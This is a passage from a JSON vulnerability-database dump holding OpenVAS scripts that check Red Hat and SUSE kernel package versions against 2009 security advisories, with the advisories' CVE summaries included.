implementation. If a signal interrupted a lock\nrequest, the local POSIX lock was incorrectly created. This could cause a\ndenial of service on the NFS server if a file descriptor was closed before\nits corresponding lock request returned. (CVE-2008-4307, Important)\n\n* a deficiency was found in the Linux kernel system call auditing\nimplementation on 64-bit systems. This could allow a local, unprivileged\nuser to circumvent a system call audit configuration, if that configuration\nfiltered based on the syscall number or arguments.\n(CVE-2009-0834, Important)\n\n* Chris Evans reported a deficiency in the Linux kernel secure-computing\nimplementation on 64-bit systems. This could allow a local, unprivileged\nuser to bypass intended access restrictions, if those access restriction\nfilters were based on the syscall number or arguments.\n(CVE-2009-0835, Important)\n\n* the exit_notify() function in the Linux kernel did not properly reset the\nexit signal if a process executed a set user ID (setuid) application before\nexiting. This could allow a local, unprivileged user to elevate their\nprivileges. (CVE-2009-1337, Important)\n\n* Chris Evans reported a deficiency in the Linux kernel signals\nimplementation. The clone() system call permits the caller to indicate the\nsignal it wants to receive when its child exits. When clone() is called\nwith the CLONE_PARENT flag, it permits the caller to clone a new child that\nshares the same parent as itself, enabling the indicated signal to be sent\nto the caller's parent (instead of the caller), even if the caller's parent\nhas different real and effective user IDs. This could lead to a denial of\nservice of the parent. (CVE-2009-0028, Moderate)\n\n* an off-by-two error was found in the set_selection() function of the\nLinux kernel. This could allow a local, unprivileged user to cause a denial\nof service when making a selection of characters in a UTF-8 console. Note:\nphysical console access is required to exploit this issue.\n(CVE-2009-1046, Low)\n\nThese updated packages also fix the following bug:\n\n* the __scsi_device_lookup_by_target() function was always returning the\nfirst matching device, regardless of the state of the device. This meant\nthat any valid device listed after a deleted device would not be found. The\n__scsi_device_lookup_by_target() function was modified so that deleted\ndevices are skipped, and valid devices are now found. (BZ#495976)\n\nAll Red Hat Enterprise MRG users should install this update, which resolves\nthese issues. For this update to take effect, the system must be rebooted.", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:0451", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1046", "CVE-2008-4307", "CVE-2009-0028", "CVE-2009-0835", "CVE-2009-1337", "CVE-2009-0834"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:63908", "href": "http://plugins.openvas.org/nasl.php?oid=63908", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0451.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0451 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0451.\n\nThe kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues:\n\n* a logic error was found in the do_setlk() function of the Linux kernel\nNetwork File System (NFS) implementation. If a signal interrupted a lock\nrequest, the local POSIX lock was incorrectly created. This could cause a\ndenial of service on the NFS server if a file descriptor was closed before\nits corresponding lock request returned. (CVE-2008-4307, Important)\n\n* a deficiency was found in the Linux kernel system call auditing\nimplementation on 64-bit systems. This could allow a local, unprivileged\nuser to circumvent a system call audit configuration, if that configuration\nfiltered based on the syscall number or arguments.\n(CVE-2009-0834, Important)\n\n* Chris Evans reported a deficiency in the Linux kernel secure-computing\nimplementation on 64-bit systems. This could allow a local, unprivileged\nuser to bypass intended access restrictions, if those access restriction\nfilters were based on the syscall number or arguments.\n(CVE-2009-0835, Important)\n\n* the exit_notify() function in the Linux kernel did not properly reset the\nexit signal if a process executed a set user ID (setuid) application before\nexiting. This could allow a local, unprivileged user to elevate their\nprivileges. (CVE-2009-1337, Important)\n\n* Chris Evans reported a deficiency in the Linux kernel signals\nimplementation. The clone() system call permits the caller to indicate the\nsignal it wants to receive when its child exits. When clone() is called\nwith the CLONE_PARENT flag, it permits the caller to clone a new child that\nshares the same parent as itself, enabling the indicated signal to be sent\nto the caller's parent (instead of the caller), even if the caller's parent\nhas different real and effective user IDs. This could lead to a denial of\nservice of the parent. (CVE-2009-0028, Moderate)\n\n* an off-by-two error was found in the set_selection() function of the\nLinux kernel. This could allow a local, unprivileged user to cause a denial\nof service when making a selection of characters in a UTF-8 console. Note:\nphysical console access is required to exploit this issue.\n(CVE-2009-1046, Low)\n\nThese updated packages also fix the following bug:\n\n* the __scsi_device_lookup_by_target() function was always returning the\nfirst matching device, regardless of the state of the device. This meant\nthat any valid device listed after a deleted device would not be found. The\n__scsi_device_lookup_by_target() function was modified so that deleted\ndevices are skipped, and valid devices are now found. (BZ#495976)\n\nAll Red Hat Enterprise MRG users should install this update, which resolves\nthese issues. For this update to take effect, the system must be rebooted.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(63908);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 16:00:35 +0200 (Tue, 05 May 2009)\");\n script_cve_id(\"CVE-2008-4307\", \"CVE-2009-0028\", \"CVE-2009-0834\", \"CVE-2009-0835\", \"CVE-2009-1046\", \"CVE-2009-1337\");\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:N/I:N/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0451\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0451.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#important\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-rt\", rpm:\"kernel-rt~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-debug\", rpm:\"kernel-rt-debug~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-debug-debuginfo\", rpm:\"kernel-rt-debug-debuginfo~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-debug-devel\", rpm:\"kernel-rt-debug-devel~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-debuginfo\", rpm:\"kernel-rt-debuginfo~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-debuginfo-common\", rpm:\"kernel-rt-debuginfo-common~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-devel\", rpm:\"kernel-rt-devel~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-trace\", rpm:\"kernel-rt-trace~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-trace-debuginfo\", rpm:\"kernel-rt-trace-debuginfo~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-trace-devel\", rpm:\"kernel-rt-trace-devel~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-vanilla\", rpm:\"kernel-rt-vanilla~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-vanilla-debuginfo\", rpm:\"kernel-rt-vanilla-debuginfo~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-vanilla-devel\", rpm:\"kernel-rt-vanilla-devel~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-doc\", rpm:\"kernel-rt-doc~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:19", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0451.\n\nThe kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues:\n\n* a logic error was found in the do_setlk() function of the Linux kernel\nNetwork File System (NFS) implementation. If a signal interrupted a lock\nrequest, the local POSIX lock was incorrectly created. This could cause a\ndenial of service on the NFS server if a file descriptor was closed before\nits corresponding lock request returned. (CVE-2008-4307, Important)\n\n* a deficiency was found in the Linux kernel system call auditing\nimplementation on 64-bit systems. This could allow a local, unprivileged\nuser to circumvent a system call audit configuration, if that configuration\nfiltered based on the syscall number or arguments.\n(CVE-2009-0834, Important)\n\n* Chris Evans reported a deficiency in the Linux kernel secure-computing\nimplementation on 64-bit systems. This could allow a local, unprivileged\nuser to bypass intended access restrictions, if those access restriction\nfilters were based on the syscall number or arguments.\n(CVE-2009-0835, Important)\n\n* the exit_notify() function in the Linux kernel did not properly reset the\nexit signal if a process executed a set user ID (setuid) application before\nexiting. This could allow a local, unprivileged user to elevate their\nprivileges. (CVE-2009-1337, Important)\n\n* Chris Evans reported a deficiency in the Linux kernel signals\nimplementation. The clone() system call permits the caller to indicate the\nsignal it wants to receive when its child exits. When clone() is called\nwith the CLONE_PARENT flag, it permits the caller to clone a new child that\nshares the same parent as itself, enabling the indicated signal to be sent\nto the caller's parent (instead of the caller), even if the caller's parent\nhas different real and effective user IDs. This could lead to a denial of\nservice of the parent. (CVE-2009-0028, Moderate)\n\n* an off-by-two error was found in the set_selection() function of the\nLinux kernel. This could allow a local, unprivileged user to cause a denial\nof service when making a selection of characters in a UTF-8 console. Note:\nphysical console access is required to exploit this issue.\n(CVE-2009-1046, Low)\n\nThese updated packages also fix the following bug:\n\n* the __scsi_device_lookup_by_target() function was always returning the\nfirst matching device, regardless of the state of the device. This meant\nthat any valid device listed after a deleted device would not be found. The\n__scsi_device_lookup_by_target() function was modified so that deleted\ndevices are skipped, and valid devices are now found. (BZ#495976)\n\nAll Red Hat Enterprise MRG users should install this update, which resolves\nthese issues. For this update to take effect, the system must be rebooted.", "cvss3": {}, "published": "2009-05-05T00:00:00", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:0451", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1046", "CVE-2008-4307", "CVE-2009-0028", "CVE-2009-0835", "CVE-2009-1337", "CVE-2009-0834"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231063908", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063908", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0451.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0451 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0451.\n\nThe kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues:\n\n* a logic error was found in the do_setlk() function of the Linux kernel\nNetwork File System (NFS) implementation. If a signal interrupted a lock\nrequest, the local POSIX lock was incorrectly created. This could cause a\ndenial of service on the NFS server if a file descriptor was closed before\nits corresponding lock request returned. (CVE-2008-4307, Important)\n\n* a deficiency was found in the Linux kernel system call auditing\nimplementation on 64-bit systems. This could allow a local, unprivileged\nuser to circumvent a system call audit configuration, if that configuration\nfiltered based on the syscall number or arguments.\n(CVE-2009-0834, Important)\n\n* Chris Evans reported a deficiency in the Linux kernel secure-computing\nimplementation on 64-bit systems. This could allow a local, unprivileged\nuser to bypass intended access restrictions, if those access restriction\nfilters were based on the syscall number or arguments.\n(CVE-2009-0835, Important)\n\n* the exit_notify() function in the Linux kernel did not properly reset the\nexit signal if a process executed a set user ID (setuid) application before\nexiting. This could allow a local, unprivileged user to elevate their\nprivileges. (CVE-2009-1337, Important)\n\n* Chris Evans reported a deficiency in the Linux kernel signals\nimplementation. The clone() system call permits the caller to indicate the\nsignal it wants to receive when its child exits. When clone() is called\nwith the CLONE_PARENT flag, it permits the caller to clone a new child that\nshares the same parent as itself, enabling the indicated signal to be sent\nto the caller's parent (instead of the caller), even if the caller's parent\nhas different real and effective user IDs. This could lead to a denial of\nservice of the parent. (CVE-2009-0028, Moderate)\n\n* an off-by-two error was found in the set_selection() function of the\nLinux kernel. This could allow a local, unprivileged user to cause a denial\nof service when making a selection of characters in a UTF-8 console. Note:\nphysical console access is required to exploit this issue.\n(CVE-2009-1046, Low)\n\nThese updated packages also fix the following bug:\n\n* the __scsi_device_lookup_by_target() function was always returning the\nfirst matching device, regardless of the state of the device. This meant\nthat any valid device listed after a deleted device would not be found. The\n__scsi_device_lookup_by_target() function was modified so that deleted\ndevices are skipped, and valid devices are now found. (BZ#495976)\n\nAll Red Hat Enterprise MRG users should install this update, which resolves\nthese issues. For this update to take effect, the system must be rebooted.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63908\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 16:00:35 +0200 (Tue, 05 May 2009)\");\n script_cve_id(\"CVE-2008-4307\", \"CVE-2009-0028\", \"CVE-2009-0834\", \"CVE-2009-0835\", \"CVE-2009-1046\", \"CVE-2009-1337\");\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:N/I:N/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0451\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0451.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#important\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-rt\", rpm:\"kernel-rt~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-debug\", rpm:\"kernel-rt-debug~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-debug-debuginfo\", rpm:\"kernel-rt-debug-debuginfo~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-debug-devel\", rpm:\"kernel-rt-debug-devel~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-debuginfo\", rpm:\"kernel-rt-debuginfo~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-debuginfo-common\", rpm:\"kernel-rt-debuginfo-common~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-devel\", rpm:\"kernel-rt-devel~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-trace\", rpm:\"kernel-rt-trace~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-trace-debuginfo\", rpm:\"kernel-rt-trace-debuginfo~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-trace-devel\", rpm:\"kernel-rt-trace-devel~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-vanilla\", rpm:\"kernel-rt-vanilla~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-vanilla-debuginfo\", rpm:\"kernel-rt-vanilla-debuginfo~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-vanilla-devel\", rpm:\"kernel-rt-vanilla-devel~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-rt-doc\", rpm:\"kernel-rt-doc~2.6.24.7~111.el5rt\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:32", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-bigsmp\n kernel-debug\n kernel-default\n kernel-kdump\n kernel-smp\n kernel-source\n kernel-syms\n kernel-vmi\n kernel-vmipae\n kernel-xen\n kernel-xenpae\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "SLES10: Security update for Linux kernel", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1046", "CVE-2008-1294", "CVE-2009-0675", "CVE-2009-0028", "CVE-2009-0676", "CVE-2009-0065"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065812", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065812", "sourceData": "#\n#VID slesp2-kernel-6109\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for Linux kernel\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kernel-bigsmp\n kernel-debug\n kernel-default\n kernel-kdump\n kernel-smp\n kernel-source\n kernel-syms\n kernel-vmi\n kernel-vmipae\n kernel-xen\n kernel-xenpae\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65812\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2009-0675\", \"CVE-2009-0676\", \"CVE-2009-0028\", \"CVE-2008-1294\", \"CVE-2009-0065\", \"CVE-2009-1046\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for Linux kernel\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vmi\", rpm:\"kernel-vmi~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-vmipae\", rpm:\"kernel-vmipae~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.16.60~0.37_f594963d\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:36", "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:045.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "SuSE Security Advisory SUSE-SA:2009:045 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-1046", "CVE-2009-1385", "CVE-2009-1758", "CVE-2009-0676", "CVE-2008-5033", "CVE-2009-2407", "CVE-2009-1389", "CVE-2009-2406", "CVE-2009-1630"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:64761", "href": "http://plugins.openvas.org/nasl.php?oid=64761", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_045.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:045 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Linux kernel update fixes the following security issues:\n\nCVE-2009-2692: A missing NULL pointer check in the socket sendpage\nfunction can be used by local attackers to gain root privileges.\n[SLES9, SLES10-SP2, SLE11, openSUSE]\n\nCVE-2009-1389: A crash on r8169 network cards when receiving\nlarge packets was fixed.\n[SLES9, SLES10-SP2, SLE11, openSUSE]\n\nCVE-2009-1758: The hypervisor_callback function in Xen allows guest\nuser applications to cause a denial of service (kernel oops) of the\nguest OS by triggering a segmentation fault in certain address\nranges.\n[SLES9, SLES10-SP2, SLE11, openSUSE]\n\nCVE-2009-1630: The nfs_permission function in fs/nfs/dir.c in the\nNFS client implementation in the Linux kernel, when atomic_open is\navailable, does not check execute (aka EXEC or MAY_EXEC) permission\nbits, which allows local users to bypass permissions and execute files,\nas demonstrated by files on an NFSv4 fileserver\n[SLE10-SP2, SLE11, openSUSE]\n\nCVE-2009-2406: A kernel stack overflow when mounting eCryptfs\nfilesystems in parse_tag_11_packet() was fixed. Code execution might\nbe possible if ecryptfs is in use.\n[SLE11, openSUSE]\n\nCVE-2009-2407: A kernel heap overflow when mounting eCryptfs\nfilesystems in parse_tag_3_packet() was fixed. Code execution might\nbe possible if ecryptfs is in use.\n[SLE11, openSUSE]\n\n(no CVE assigned yet): An information leak from using sigaltstack.\n[SLES9, SLES10-SP2, SLE11, openSUSE]\n\nCVE-2009-0676: A memory disclosure via the SO_BSDCOMPAT socket\noption\n[openSUSE 10.3 only]\n\nCVE-2009-1895: Personality flags on set*id were not cleared\ncorrectly, so ASLR and NULL page protection could be bypassed.\n[openSUSE 11.0 only]\n\nCVE-2009-1046: utf-8 console memory corruption that can be used for\nlocal privilege escalation\n[openSUSE 11.0 only]\n\nCVE-2008-5033: Oops in video4linux tvaudio\n[openSUSE 11.0 only]\n\nCVE-2009-1385: A Integer underflow in the 